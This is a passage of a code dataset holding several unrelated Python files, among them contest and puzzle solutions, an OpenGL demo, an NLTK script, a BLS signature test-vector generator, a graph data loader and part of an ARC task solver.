7)\nINF = 10 ** 20\nMOD = 10 ** 9 + 7\n\n\ndef II(): return int(input())\ndef ILI(): return list(map(int, input().split()))\ndef IAI(LINE): return [ILI() for __ in range(LINE)]\ndef IDI(): return {key: value for key, value in ILI()}\n\n\ndef read():\n N, A, B, C, D = ILI()\n return N, A, B, C, D\n\n\ndef solve(N, A, B, C, D):\n dif_ab = abs(B - A)\n dif_cd = D - C\n n_dif = N - 1\n\n d_div, d_mod = divmod(dif_ab, D)\n\n if d_div > n_dif:\n return \"NO\"\n else:\n n_dif_rest = n_dif - d_div\n dif_rest = d_mod\n if n_dif_rest == 0:\n if d_mod == 0:\n return \"YES\"\n else:\n return \"NO\"\n else:\n if d_mod >= C:\n dif_rest -= C\n n_dif_rest -= 1\n\n if n_dif_rest % 2 == 1:\n dif_rest += C\n n_dif_rest -= 1\n\n if dif_rest <= n_dif_rest * dif_cd:\n return \"YES\"\n\n return \"NO\"\n\n\ndef main():\n params = read()\n print(solve(*params))\n\n\nif __name__ == \"__main__\":\n 
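# read N, A, B, C, D from stdin, solve, and print YES or NO\n    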
main()\n","sub_path":"AGC_017/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"364442429","text":"\"\"\"\nSuppose an arithmetic expression is given as a binary tree. Each leaf is an integer\nand each internal node is one of '+', '−', '∗', or '/'.\n\nGiven the root to such a tree, write a function to evaluate it.\n\nFor example, given the following tree:\n\n    *\n   / \\\n  +    +\n / \\  / \\\n3  2 4  5\nYou should return 45, as it is (3 + 2) * (4 + 5).\n\"\"\"\n\n\nclass Node:\n    def __init__(self, val):\n        self.val = val\n        self.left = None\n        self.right = None\n\n\ndef solve_graph(root):\n    if root.val.isnumeric():\n        return float(root.val)\n\n    return eval(\"{} {} {}\".format(solve_graph(root.left), root.val, solve_graph(root.right)))\n\n\nnode_a = Node(\"*\")\nnode_b = Node(\"+\")\nnode_c = Node(\"3\")\nnode_d = Node(\"2\")\nnode_e = Node(\"+\")\nnode_f = Node(\"4\")\nnode_g = Node(\"5\")\n\nnode_a.left = node_b\nnode_b.left = node_c\nnode_b.right = node_d\nnode_a.right = node_e\nnode_e.left = node_f\nnode_e.right = node_g\n\nprint(solve_graph(node_a))\nprint(solve_graph(node_e))\n","sub_path":"Coding_Challenges/problem_50.py","file_name":"problem_50.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"127219909","text":"import nltk, unicodedata\n\n# json_list is assumed to be loaded elsewhere: a list of documents,\n# each a list of dicts with a 'text' field\nstopwords = nltk.corpus.stopwords.words('english')\nall_content = \"\"\nfor c in json_list:\n    # the original nested loop re-joined and appended the same document\n    # once per entry, duplicating its content len(c) times\n    content = \" \".join(d['text'] for d in c)\n    all_content += content + ' '\n\nall_content = all_content.lower()\nall_content = unicodedata.normalize('NFKD', all_content).encode('ascii', 'ignore')\n\ntokens = all_content.split()\nnonstop_tokens = [w for w in tokens if not w in stopwords]\ntext = nltk.Text(nonstop_tokens)\nbgms = nltk.bigrams(nonstop_tokens)\ntgms = nltk.trigrams(nonstop_tokens)\nunidist = text.vocab() # able to query by freq of terms using fdist['term']\n\nbgm_dist = nltk.FreqDist(bgms)\ntgm_dist = nltk.FreqDist(tgms)\n\n# Look into more available in NLTK metrics package","sub_path":"scripts/nltk_stats.py","file_name":"nltk_stats.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"303458","text":"# import the pygame module, so you can use it\nimport pygame\nimport random\nimport numpy\nimport glm # pip3 install pyglm\nimport pyassimp # pip3 install pyassimp\nfrom OpenGL.GL import *\nfrom OpenGL.GL.shaders import compileProgram, compileShader\n\n# define a main function\n\n# initialize the pygame module\npygame.init()\n\n# create a surface on screen with a size of 800 x 600\nscreen = pygame.display.set_mode((800, 600), pygame.OPENGL | pygame.DOUBLEBUF)\nclock = pygame.time.Clock()\n\nglClearColor(0.5, 1.0, 0.5, 1.0)\n\nvertex_shader = \"\"\"\n#version 460\nlayout (location = 0) in vec3 position;\nlayout (location = 1) in vec3 vertexColor;\nout vec3 ourColor;\nuniform mat4 superMatriz;\n\nvoid main()\n{\n    gl_Position = superMatriz * vec4(position.x, position.y, position.z, 1.0);\n    ourColor = vertexColor;\n}\n\"\"\"\n\nfragment_shader = \"\"\"\n#version 460\nlayout(location = 0) out vec4 fragColor;\n\nin vec3 ourColor;\n\nvoid main()\n{\n    fragColor = vec4(ourColor, 1);\n}\n\"\"\"\n\nshader = compileProgram(\n    compileShader(vertex_shader, GL_VERTEX_SHADER),\n    compileShader(fragment_shader, 
GL_FRAGMENT_SHADER)\n)\n\n\nvertex_data = numpy.array([\n 0.5, 0.5, 0.0, 1, 0, 0, # top right\n 0.5, -0.5, 0.0, 0, 1, 0, # bottom right\n -0.5, -0.5, 0.0, 0, 0, 1, # bottom left\n -0.5, 0.5, 0.0, 1, 1, 0, # top left\n], dtype=numpy.float32)\n\nindex_data = numpy.array([\n 0, 1, 3, # first triangle\n 1, 2, 3 # second triangle\n], dtype=numpy.uint32)\n\nvertex_array_object = glGenVertexArrays(1)\nglBindVertexArray(vertex_array_object)\n\nvertex_buffer_object = glGenBuffers(1)\nglBindBuffer(GL_ARRAY_BUFFER, vertex_buffer_object)\nglBufferData(GL_ARRAY_BUFFER, vertex_data.nbytes, vertex_data, GL_STATIC_DRAW)\n\nelement_buffer_object = glGenBuffers(1)\nglBindBuffer(GL_ELEMENT_ARRAY_BUFFER, element_buffer_object)\nglBufferData(GL_ELEMENT_ARRAY_BUFFER, index_data.nbytes, index_data, GL_STATIC_DRAW)\n\nglVertexAttribPointer(\n 0, # attribute 0. No particular reason for 0, but must match the layout in the shader.\n 3, # size\n GL_FLOAT, # type\n GL_FALSE, # normalized?\n 4 * 6, # stride\n ctypes.c_void_p(0) # array buffer offset\n)\nglEnableVertexAttribArray(0)\n\n\nglVertexAttribPointer(\n 1, # attribute 0. No particular reason for 0, but must match the layout in the shader.\n 3, # size\n GL_FLOAT, # type\n GL_FALSE, # normalized?\n 4 * 6, # stride\n ctypes.c_void_p(4 * 3) # array buffer offset\n)\nglEnableVertexAttribArray(1)\n\n\n\ni = glm.mat4(1)\n\ntranslate = glm.translate(i, glm.vec3(0, 0, 0))\nrotate = glm.rotate(i, 0, glm.vec3(0, 1, 0))\nscale = glm.scale(i, glm.vec3(1, 1, 1))\n\nmodel = translate * rotate * scale\nview = glm.lookAt(glm.vec3(0, 0, 2), glm.vec3(0, 0, 0), glm.vec3(0, 1, 0))\nprojection = glm.perspective(glm.radians(45), 800/600, 0.1, 1000.0)\n\nsuperMatriz = projection * view * model\n\nglViewport(0, 0, 800, 600)\n\n# define a variable to control the main loop\nrunning = True\n# main loop\ncounter = 0\nwhile running:\n glClear(GL_COLOR_BUFFER_BIT)\n\n glUseProgram(shader)\n\n glUniformMatrix4fv(\n glGetUniformLocation(shader, \"superMatriz\"),\n 1,\n GL_FALSE,\n glm.value_ptr(superMatriz)\n )\n\n # glDrawArrays(GL_TRIANGLES, 0, 6)\n glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_INT, None)\n\n # GL_LINE_LOOP\n \n pygame.display.flip()\n clock.tick(15)\n counter+=1","sub_path":"simple5.py","file_name":"simple5.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"271746060","text":"def sort(list):\n for i in range(len(list)-1):\n j=i+1\n key=list[j]\n while i>=0 and list[i]>key:\n list[i+1]=list[i]\n i=i-1\n list[i+1]=key\n return list\nlist=[2,5,1,4,3]\nprint(sort(list))","sub_path":"Insertsort.py","file_name":"Insertsort.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"414930243","text":"#!/usr/bin/python3\n\nimport sys,numpy\n\nf = [t.strip() for t in sys.stdin]\nM=[]\nfor i in f:\n M.append([int(x) for x in i])\n\nM = numpy.array(M)\nN = M\n\n#print(M)\n\ndef mset(M,F,x,y):\n if x<0 or y<0:\n return\n if x>len(M)-1:\n return\n if y>len(M[x])-1:\n return\n if F[x][y]:\n return\n \n M[x][y]+=1\n \ndef c(M):\n F = M<-1000\n \n M = M + 1\n\n T = M > 9\n cnt=0\n all=False\n while T.any():\n cnt+=sum(sum(T))\n\n for x in range(len(M)):\n for y in range(len(M[x])):\n if T[x][y] and not F[x][y]:\n F[x][y]=True\n M[x][y]=0\n mset(M,F,x-1,y-1)\n mset(M,F,x-1,y)\n mset(M,F,x-1,y+1)\n mset(M,F,x,y-1)\n mset(M,F,x,y+1)\n mset(M,F,x+1,y-1)\n mset(M,F,x+1,y)\n mset(M,F,x+1,y+1)\n T = M > 9\n 
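# return the grid, the number of flashes this step, and whether every cell has flashed\n    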
return(M,cnt,F.all())\n\nflashes=0\nall=-1\nfor i in range(100):\n (M,f,a)=c(M)\n flashes+=f\n if a:\n all=i\n \nprint(\"Answer 1:\",flashes)\ni+=1\n\nif not a:\n while True:\n (M,f,a)=c(M)\n flashes+=f\n if a:\n all=i\n break\n i+=1\n\nprint(\"Answer 2:\",all+1)\n\n","sub_path":"2021/11/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"525515192","text":"\"\"\"\nBLS test vectors generator\n\"\"\"\n\nfrom typing import Tuple, Iterable, Any, Callable, Dict\n\nfrom eth_utils import (\n encode_hex,\n int_to_big_endian,\n)\nfrom gen_base import gen_runner, gen_typing\n\nfrom py_ecc import bls\nfrom hashlib import sha256\n\nfrom eth2spec.test.context import PHASE0\n\ndef hash(x):\n return sha256(x).digest()\n\n\nF2Q_COEFF_LEN = 48\nG2_COMPRESSED_Z_LEN = 48\nDST = bls.G2ProofOfPossession.DST\n\n\ndef int_to_hex(n: int, byte_length: int = None) -> str:\n byte_value = int_to_big_endian(n)\n if byte_length:\n byte_value = byte_value.rjust(byte_length, b'\\x00')\n return encode_hex(byte_value)\n\n\ndef hex_to_int(x: str) -> int:\n return int(x, 16)\n\n\nMESSAGES = [\n bytes(b'\\x00' * 32),\n bytes(b'\\x56' * 32),\n bytes(b'\\xab' * 32),\n]\n\nPRIVKEYS = [\n # Curve order is 256 so private keys are 32 bytes at most.\n # Also not all integers is a valid private key, so using pre-generated keys\n hex_to_int('0x00000000000000000000000000000000263dbd792f5b1be47ed85f8938c0f29586af0d3ac7b977f21c278fe1462040e3'),\n hex_to_int('0x0000000000000000000000000000000047b8192d77bf871b62e87859d653922725724a5c031afeabc60bcef5ff665138'),\n hex_to_int('0x00000000000000000000000000000000328388aff0d4a5b7dc9205abd374e7e98f3cd9f3418edb4eafda5fb16473d216'),\n]\n\n\ndef case01_sign():\n for privkey in PRIVKEYS:\n for message in MESSAGES:\n sig = bls.G2ProofOfPossession.Sign(privkey, message)\n identifier = f'{int_to_hex(privkey)}_{encode_hex(message)}'\n yield f'sign_case_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'privkey': int_to_hex(privkey),\n 'message': encode_hex(message),\n },\n 'output': encode_hex(sig)\n }\n\n\ndef case02_verify():\n for i, privkey in enumerate(PRIVKEYS):\n for message in MESSAGES:\n # Valid signature\n signature = bls.G2ProofOfPossession.Sign(privkey, message)\n pubkey = bls.G2ProofOfPossession.PrivToPub(privkey)\n identifier = f'{encode_hex(pubkey)}_{encode_hex(message)}'\n yield f'verify_valid_case_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkey': encode_hex(pubkey),\n 'message': encode_hex(message),\n 'signature': encode_hex(signature),\n },\n 'output': True,\n }\n\n # Invalid signatures -- wrong pubkey\n wrong_pubkey = bls.G2ProofOfPossession.PrivToPub(PRIVKEYS[(i + 1) % len(PRIVKEYS)])\n identifier = f'{encode_hex(wrong_pubkey)}_{encode_hex(message)}'\n yield f'verify_wrong_pubkey_case_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkey': encode_hex(wrong_pubkey),\n 'message': encode_hex(message),\n 'signature': encode_hex(signature),\n },\n 'output': False,\n }\n\n # Invalid signature -- tampered with signature\n tampered_signature = signature[:-4] + b'\\xFF\\xFF\\xFF\\xFF'\n identifier = f'{encode_hex(pubkey)}_{encode_hex(message)}'\n yield f'verify_tampered_signature_case_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkey': encode_hex(pubkey),\n 'message': encode_hex(message),\n 'signature': encode_hex(tampered_signature),\n },\n 'output': False,\n }\n\n\ndef 
case03_aggregate():\n for message in MESSAGES:\n sigs = [bls.G2ProofOfPossession.Sign(privkey, message) for privkey in PRIVKEYS]\n yield f'aggregate_{encode_hex(message)}', {\n 'input': [encode_hex(sig) for sig in sigs],\n 'output': encode_hex(bls.G2ProofOfPossession.Aggregate(sigs)),\n }\n\n\ndef case04_fast_aggregate_verify():\n for i, message in enumerate(MESSAGES):\n privkeys = PRIVKEYS[:i + 1]\n sigs = [bls.G2ProofOfPossession.Sign(privkey, message) for privkey in privkeys]\n aggregate_signature = bls.G2ProofOfPossession.Aggregate(sigs)\n pubkeys = [bls.G2ProofOfPossession.PrivToPub(privkey) for privkey in privkeys]\n pubkeys_serial = [encode_hex(pubkey) for pubkey in pubkeys]\n\n # Valid signature\n identifier = f'{pubkeys_serial}_{encode_hex(message)}'\n yield f'fast_aggregate_verify_valid_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkeys': pubkeys_serial,\n 'message': encode_hex(message),\n 'signature': encode_hex(aggregate_signature),\n },\n 'output': True,\n }\n\n # Invalid signature -- extra pubkey\n pubkeys_extra = pubkeys + [bls.G2ProofOfPossession.PrivToPub(PRIVKEYS[-1])]\n pubkeys_extra_serial = [encode_hex(pubkey) for pubkey in pubkeys_extra]\n identifier = f'{pubkeys_extra_serial}_{encode_hex(message)}'\n yield f'fast_aggregate_verify_extra_pubkey_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkeys': pubkeys_extra_serial,\n 'message': encode_hex(message),\n 'signature': encode_hex(aggregate_signature),\n },\n 'output': False,\n }\n\n # Invalid signature -- tampered with signature\n tampered_signature = aggregate_signature[:-4] + b'\\xff\\xff\\xff\\xff'\n identifier = f'{pubkeys_serial}_{encode_hex(message)}'\n yield f'fast_aggregate_verify_tampered_signature_{(hash(bytes(identifier, \"utf-8\"))[:8]).hex()}', {\n 'input': {\n 'pubkeys': pubkeys_serial,\n 'message': encode_hex(message),\n 'signature': encode_hex(tampered_signature),\n },\n 'output': False,\n }\n\n\ndef case05_aggregate_verify():\n pairs = []\n sigs = []\n for privkey, message in zip(PRIVKEYS, MESSAGES):\n sig = bls.G2ProofOfPossession.Sign(privkey, message)\n pubkey = bls.G2ProofOfPossession.PrivToPub(privkey)\n pairs.append({\n 'pubkey': encode_hex(pubkey),\n 'message': encode_hex(message),\n })\n sigs.append(sig)\n\n aggregate_signature = bls.G2ProofOfPossession.Aggregate(sigs)\n yield f'aggregate_verify_valid', {\n 'input': {\n 'pairs': pairs,\n 'signature': encode_hex(aggregate_signature),\n },\n 'output': True,\n }\n\n tampered_signature = aggregate_signature[:4] + b'\\xff\\xff\\xff\\xff'\n yield f'aggregate_verify_tampered_signature', {\n 'input': {\n 'pairs': pairs,\n 'signature': encode_hex(tampered_signature),\n },\n 'output': False,\n }\n\n\ndef create_provider(handler_name: str,\n test_case_fn: Callable[[], Iterable[Tuple[str, Dict[str, Any]]]]) -> gen_typing.TestProvider:\n\n def prepare_fn(configs_path: str) -> str:\n # Nothing to load / change in spec. 
Maybe in future forks.\n # Put the tests into the general config category, to not require any particular configuration.\n return 'general'\n\n def cases_fn() -> Iterable[gen_typing.TestCase]:\n for data in test_case_fn():\n print(data)\n (case_name, case_content) = data\n yield gen_typing.TestCase(\n fork_name=PHASE0,\n runner_name='bls',\n handler_name=handler_name,\n suite_name='small',\n case_name=case_name,\n case_fn=lambda: [('data', 'data', case_content)]\n )\n\n return gen_typing.TestProvider(prepare=prepare_fn, make_cases=cases_fn)\n\n\nif __name__ == \"__main__\":\n gen_runner.run_generator(\"bls\", [\n create_provider('sign', case01_sign),\n create_provider('verify', case02_verify),\n create_provider('aggregate', case03_aggregate),\n create_provider('fast_aggregate_verify', case04_fast_aggregate_verify),\n create_provider('aggregate_verify', case05_aggregate_verify),\n ])\n","sub_path":"tests/generators/bls/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"566565063","text":"import torch\nfrom torch.utils.data import DataLoader, Subset\nfrom torch_geometric.data import Batch\n\nfrom sklearn.model_selection import train_test_split\n\n\nclass MolecularDataLoader:\n r\"\"\"Data loader which merges data objects from a\n :class:`torch_geometric.data.dataset` to a mini-batch.\n\n Args:\n dataset (Dataset): The dataset from which to load the data.\n batch_size (int, optional): How many samples per batch to load.\n (default: :obj:`1`)\n shuffle (bool, optional): If set to :obj:`True`, the data will be\n reshuffled at every epoch. (default: :obj:`False`)\n follow_batch (list or tuple, optional): Creates assignment batch\n vectors for each key in the list. (default: :obj:`[]`)\n \"\"\"\n def __init__(self, hparams, dataset):\n self.hparams = hparams\n self.num_samples = len(dataset)\n self.dataset = dataset\n self.train_indices, self.val_indices = train_test_split(range(self.num_samples))\n\n def collate(self, data_list):\n return Batch.from_data_list(data_list)\n\n def get_train(self):\n dataset = Subset(self.dataset, self.train_indices)\n return DataLoader(\n dataset=dataset,\n collate_fn=lambda b: self.collate(b),\n batch_size=self.hparams.batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=self.hparams.num_workers)\n\n def get_val(self):\n dataset = Subset(self.dataset, self.val_indices)\n return DataLoader(\n dataset=dataset,\n collate_fn=lambda b: self.collate(b),\n batch_size=self.hparams.batch_size,\n shuffle=False,\n pin_memory=True,\n num_workers=self.hparams.num_workers)\n","sub_path":"tasks/autoencoding/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"17376749","text":"#!/usr/bin/python\n\"\"\"NUI Galway CT5148 Programming and Tools for AI (James McDermott)\n\nCT5148 Assignment 3: ARC\nStudent name(s): Alexey Shapovalov\nStudent ID(s): XXXXXXXX\nGitHub: https://github.com/alexs95/ARC\n\nChoice of Task\n---------------------------------------------------------------\nI looked through about 50 - 75 different tasks to decide which ones to implement.\nWhat I found out is that tasks that I found the hardest to solve were ones I could not\nfigure out the pattern to the solution. 
However, once I figured out the pattern, I\nalmost always found they would be fairly easy to implement.\nAs examples of this point, these were the tasks I found the hardest to solve:\n6d0160f0 - this one took the longest to figure out, I was at it for at least 15 mins\n44f52bb0 - still not sure if what I think is the answer to this is correct\n68b16354 - convinced myself this one was a bug (looked purely random) before I finally figured it out\n6d58a25d - not sure why it took so long but I could not figure it out\n99b1bc43 - I came up with very imaginative theories on what dictates\n    the number of lines coming out of the triangle\n\nInstead of choosing any of these, the criterion by which I judged the tasks' \"difficulty\" was how hard\nI thought it would be to solve them programmatically.\nThe main \"feel\" for this difficulty was when I had to take a minute to figure out what\nit was I actually did to come up with a solution. Judging by this criterion, I would consider\nthe tasks above much easier to implement. For example, 68b16354 amounts to swapping rows.\n\n\nCode structure & GitHub\n---------------------------------------------------------------\nI did all my work on the assignment branch, which I merged to master when I was finished.\nThe README contains comments about the purpose of this fork.\n\nThe code is laid out as follows:\n    First there are three classes representing different levels of abstraction\n    over objects in the task. These provide an API for querying the input.\n    Then come the solve_ functions, each followed by the helper functions\n    used in its solution.\n\n\nReflection\n---------------------------------------------------------------\nI would consider the main similarity between these (and all the other) tasks\nto be pattern matching and the interpretation of colors.\nAll of the challenges require you to figure out (the pattern) a set of transformations\nto the input grid by interpreting what the colors mean.\nYou have a set of examples to figure out this pattern. In my solution the\nthree classes contain transformations that (along with the function downscale, had it\nbeen implemented more generally) could potentially be used for more than one task.\nThe method get_adjacency_collections would be an example of pattern matching.\nThe actual solutions would in a way contain the interpretation of the colors.\n\nSimilarities:\nInterpretation: All three solutions had a concept of a \"background\" on which\nthings were happening.\n\nPattern matching: All three required understanding the significance of\ncells of equal color being next to each other.\n\nTransformation: 0e206a2e required understanding of geometrical transformation concepts\n(but the transformations themselves were different).\n\nDifferences:\nThe most obvious difference is that the pattern needed to solve each task was different.\n\nThere was a concept of a path in b782dc8a.\n\n\nRelationship to Chollet paper\n---------------------------------------------------------------\nSadly, as this was our second-last assignment, I was really stuck for time (I could not start as soon\nas I would have liked as I had to finish previous ones). I only had a chance to skim through the paper, so\nthis section might be taken with a pinch of salt... possibly a lot of salt.\nI did want to give it a go. I will read it properly over Christmas for sure,\nI found it very interesting!\n\nMy interpretation of the goal of the ARC dataset is to provide a dataset that, if solved, would represent\na more general artificial intelligence. 
It explains how state of the art applications of machine\nlearning are usually very specific to one narrow task, e.g. playing Go or chess,\nbut are not generally intelligent. The ARC dataset sets out to contain general\ntasks that would need to be a solved by an AI that is more generally intelligent.\nThe Chollet paper describes a set of priors that an entity can have to solve\nthese general tasks. I am thinking these would correspond to the similarities\nin my solutions. For example the concept of rotating, moving, recognising squares\netc. This would loosely correspond to the three classes at the start of my solution.\nThe actual solve_ functions would correspond to the use of these priors to solve the\ntasks, I guess this is what the AI would actually need to have understand.\n\n\"\"\"\n\nfrom itertools import combinations, product\nfrom collections import defaultdict\nfrom numpy import linalg\nimport numpy as np\nimport json\nimport os\nimport re\n\n\nclass ColouredPoint:\n \"\"\"An abstraction of a point in the input array providing utility methods and\n transformations on the point\"\"\"\n\n def __init__(self, x, y, color):\n self.x = x\n self.y = y\n self.color = color\n\n def euclidean(self, other):\n \"\"\"Euclidean distance between this and other\"\"\"\n return linalg.norm([self.x - other.x, self.y - other.y])\n\n def rotate(self, degrees):\n \"\"\"Returns a new point by rotating this one about the origin (0, 0) by the given degrees\"\"\"\n\n # Based on https://www.onlinemathlearning.com/transformation-review.html\n if degrees == 90:\n return ColouredPoint(x=-self.y, y=-self.x, color=self.color)\n elif degrees == 180:\n return ColouredPoint(x=-self.x, y=-self.y, color=self.color)\n elif degrees == 270:\n return ColouredPoint(x=self.y, y=-self.x, color=self.color)\n else:\n raise ValueError(\"Unsupported degrees: {}\".format(degrees))\n\n def reflect(self, axis):\n \"\"\"Returns a new point by reflecting this one across the given axis\"\"\"\n\n # Based on https://www.onlinemathlearning.com/transformation-review.html\n if axis == \"x\":\n return ColouredPoint(x=self.x, y=-self.y, color=self.color)\n elif axis == \"y\":\n return ColouredPoint(x=-self.x, y=self.y, color=self.color)\n elif axis == \"x=y\":\n return ColouredPoint(x=self.y, y=self.x, color=self.color)\n else:\n raise ValueError(\"Unsupported axis: {}\".format(axis))\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y and self.color == other.color\n\n def __str__(self):\n return \"({}: ({}, {}))\".format(self.color, self.x, self.y)\n\n\nclass Collection:\n \"\"\"An abstraction representing a collection of points: provides information about the points\n and methods (transformations) that operate the collection as a whole.\n \"\"\"\n\n def __init__(self, points):\n points = list(points)\n self.points = points\n self.min_x = min(p.x for p in points)\n self.min_y = min(p.y for p in points)\n self.max_x = max(p.x for p in points)\n self.max_y = max(p.y for p in points)\n self.shape = (self.max_x - self.min_x + 1, self.max_y - self.min_y + 1)\n self.colors = set([p.color for p in points])\n\n def asnumpy(self, background=0):\n arr = np.full(self.shape, background)\n for p in self.points:\n arr[p.x - self.min_x][p.y - self.min_y] = p.color\n return arr\n\n def fill(self, arr, color=None):\n \"\"\"Fills arr (numpy array) with the points in this collection. 
If color is provided each point\n will be filled with color rather than the color of the point\n \"\"\"\n\n for point in self.points:\n arr[point.x][point.y] = color if color is not None else point.color\n\n def translate(self, source, destination):\n \"\"\"Translates each point in the collection defined by the translation\n from source (point) to destination (point)\n \"\"\"\n\n # Based on https://www.onlinemathlearning.com/transformation-review.html\n x_diff = destination.x - source.x\n y_diff = destination.y - source.y\n return Collection(\n ColouredPoint(x=p.x+x_diff, y=p.y+y_diff, color=p.color) for p in self.points\n )\n\n def rotate(self, degrees):\n return Collection(p.rotate(degrees) for p in self.points)\n\n def reflect(self, axis):\n return Collection(p.reflect(axis) for p in self.points)\n\n def __str__(self):\n return str(self.asnumpy())\n\n def __eq__(self, other):\n if len(other.points) == len(self.points):\n sorted_points = sorted(other.points, key=lambda p: (p.x, p.y, p.color))\n other_sorted_points = sorted(self.points, key=lambda p: (p.x, p.y, p.color))\n return all(a == b for (a, b) in zip(sorted_points, other_sorted_points))\n else:\n return False\n\n\nclass Grid:\n \"\"\"An abstraction representing a grid - provides information about arr and\n contains methods that return Collections and ColouredPoints\"\"\"\n def __init__(self, X):\n self.arr = X\n self.visited_mark = -1\n\n def colors(self):\n \"\"\"Returns a color frequency distribution as a dict\"\"\"\n unique, counts = np.unique(self.arr, return_counts=True)\n return {k: v for (k, v) in zip(unique, counts)}\n\n def get_points_by_color(self, color=None):\n \"\"\"Returns a Collection of all the points that have the same color\"\"\"\n points = []\n for x in range(self.arr.shape[0]):\n for y in range(self.arr.shape[1]):\n if self.arr[x][y] == color:\n points.append(ColouredPoint(x, y, color))\n return Collection(points)\n\n def get_adjacency_collections(self, avoid_color, match_color=None):\n \"\"\"Returns a list of Collection consisting of points that are not avoid_color and have\n at least one other neighbouring point on either the x-axis or the y-axis\n\n If match_color is set the points must be that color\n \"\"\"\n\n collections = []\n visited = np.zeros(self.arr.shape)\n for x in range(self.arr.shape[0]):\n for y in range(self.arr.shape[1]):\n collection = self._traverse(x, y, visited, avoid_color, match_color)\n if collection is not None:\n collections.append(Collection(collection))\n\n return collections\n\n def _traverse(self, x, y, visited, avoid_color, match_color):\n stop_condition = (\n x == -1 or x == self.arr.shape[0] or\n y == -1 or y == self.arr.shape[1] or\n self.arr[x][y] == avoid_color or\n visited[x][y] == self.visited_mark or\n (match_color is not None and self.arr[x][y] != match_color)\n )\n\n if not stop_condition:\n visited[x][y] = self.visited_mark\n point = ColouredPoint(x, y, self.arr[x][y])\n points = [point]\n for neighbour in ((x, y-1), (x, y+1), (x+1, y), (x-1, y)):\n nx, ny = neighbour\n new = self._traverse(nx, ny, visited, avoid_color, match_color)\n if new is not None:\n points += new\n\n return points\n\n return None\n\n\ndef solve_0e206a2e(X, background=0):\n \"\"\"I would consider this one to be the hardest of all my choices. 
It was not super easy\n to solve as a human (in comparison to others) but also the real difficulty was that\n even after thinking about it for a while, I was not fully sure of the exact steps\n I took in my head to solve it.\n\n The steps in my head for solving it are:\n 1. Find the shape(s) and the \"dots\" that the shapes need to be placed on.\n 2. Figure out which shape belongs to which set of \"dots\".\n 3. Move the shape(s) into the correct position, judging it by the dots.\n 4. Remove the old position of the shape(s).\n\n Algorithm:\n 1. The pattern here was that shapes would need to be connected by at least\n one neighbour on the horizontal or vertical. The way I figured out the\n reference \"dots\" was by creating sets of that that were closest together,\n my metric for closest was summed distance.\n 2. I brute forced this, just tried every possible combination\n of shape and set of \"dots\".\n 3. Move actually corresponded to transform.. you could also rotate, or flip\n before moving. Also brute forced this step by trying all possibilities\n of rotating and flipping until I found any match.\n 4. This was easily done by starting with a blank canvas for the solution.\n\n Tasks solved: All\n \"\"\"\n\n # 4) The solution will be on a blank canvas\n Y = np.full(X.shape, background)\n\n # Extract what is needed from the input\n X = Grid(X)\n collections = X.get_adjacency_collections(background)\n colors = X.colors()\n\n # 1.a) Find the target collections, these need to be transformed to match the location\n # of the corresponding reference points\n targets = [s for s in collections if len(s.colors) >= len(colors) - 1]\n\n # 1.b) Find the reference collections, the target collections\n # will be transformed based on these points\n references = find_references(s for s in collections if len(s.colors) < len(colors) - 1)\n\n # 2) Brute force search on all (target, reference) possibilities\n for target, reference in product(targets, references):\n # 3) Try to find a transformation that places the target on reference\n transformation = find_transformation(target, reference)\n if transformation is not None:\n # Draw the transformed collection in the correct location\n # if a valid transformation is found\n transformation.fill(Y)\n \n return Y\n\n\ndef find_references(collections):\n \"\"\"The reference points will be the set of points of unique colors that are nearest to each other.\n I defined \"nearest to each other\" as the nearest summed euclidean distance between each point\n \n collections - list of Collection - points to find references from (the collections\n will be flattened)\n \"\"\"\n \n references = []\n \n # Flatten collections to points\n points = [p for s in collections for p in s.points]\n \n # Greedily find the set of points that are unique in color and have minimum summed distance\n while len(points) != 0:\n support = find_best_reference_set(points)\n if len(support) > 1:\n references.append(Collection(support))\n points = [p for p in points if p not in support]\n\n return references\n\n\ndef find_best_reference_set(points):\n \"\"\"Finds the best set of points that have a minimum summed distance between each point\"\"\"\n\n # Group points by color\n grouped = defaultdict(list)\n for point in points:\n grouped[point.color].append(point)\n\n # Brute force search on all combinations of points with unique colors\n possibilities = product(*[grouped[key] for key in grouped])\n return min(possibilities, key=summed_distances)\n\n\ndef summed_distances(points):\n return 
